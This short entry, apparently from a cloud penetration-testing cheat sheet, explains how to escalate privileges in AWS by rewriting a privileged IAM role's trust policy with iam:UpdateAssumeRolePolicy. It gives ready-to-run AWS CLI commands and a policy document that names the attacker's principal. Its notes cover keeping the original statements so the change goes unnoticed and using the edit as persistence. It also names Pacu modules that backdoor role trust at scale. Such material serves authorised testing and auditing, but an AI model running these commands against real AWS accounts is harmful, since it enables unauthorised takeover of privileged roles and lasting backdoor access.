A role's trust policy (AssumeRolePolicyDocument) decides who may assume it. iam:UpdateAssumeRolePolicy rewrites that document, so you edit a privileged role's trust to name your own principal, then assume it.
Rewrite the trust and assume#
cat > trust.json <<'EOF'
{"Version":"2012-10-17","Statement":[{"Effect":"Allow",
"Principal":{"AWS":"arn:aws:iam::<acct>:user/<you>"},
"Action":"sts:AssumeRole"}]}
EOF
aws iam update-assume-role-policy --role-name <privileged-role> \
--policy-document file://trust.json
aws sts assume-role --role-arn arn:aws:iam::<acct>:role/<privileged-role> \
--role-session-name s
Exploitation notes#
- This overwrites the trust document, so preserve the original statements and append yours to avoid breaking the role's legitimate use.
- Needs only
iam:UpdateAssumeRolePolicyon the role plussts:AssumeRole; the role's own permissions are inherited on assumption. - A durable trust edit also serves as persistence, since your principal keeps the ability to assume the role.
Tools#
- AWS CLI (
iam update-assume-role-policy,sts assume-role). - Pacu (
iam__privesc_scan,iam__backdoor_assume_role): detects the path and backdoors role trust across roles at scale.